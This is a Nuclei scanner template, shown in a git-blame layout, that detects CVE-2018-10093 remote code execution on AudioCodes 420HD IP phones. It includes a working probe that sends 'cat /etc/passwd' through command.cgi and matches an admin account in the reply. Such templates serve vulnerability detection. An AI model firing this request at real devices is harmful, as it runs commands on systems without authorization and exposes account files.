2021-10-18 12:44:09 +00:00
|
|
|
id: CVE-2018-10093
|
|
|
|
|
|
|
|
info:
|
2022-06-19 15:33:04 +00:00
|
|
|
name: AudioCode 420HD - Remote Code Execution
|
2021-10-18 12:44:09 +00:00
|
|
|
author: wisnupramoedya
|
2021-10-18 15:19:41 +00:00
|
|
|
severity: high
|
2022-06-20 15:52:23 +00:00
|
|
|
description: |
|
2022-06-20 17:58:28 +00:00
|
|
|
AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.
|
2021-10-18 12:44:09 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/46164
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10093
|
2022-06-20 17:58:28 +00:00
|
|
|
- https://www.exploit-db.com/exploits/46164/
|
|
|
|
- http://seclists.org/fulldisclosure/2019/Jan/38
|
2021-10-18 15:19:41 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.8
|
2021-10-18 15:19:41 +00:00
|
|
|
cve-id: CVE-2018-10093
|
|
|
|
cwe-id: CWE-862
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2018,rce,iot,audiocode,edb,seclists
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-10-18 12:44:09 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-18 12:44:09 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/command.cgi?cat%20/etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-11-04 11:07:38 +00:00
|
|
|
- "admin:.*:*sh$"
|
2021-10-18 12:44:09 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-19 15:33:04 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/19
|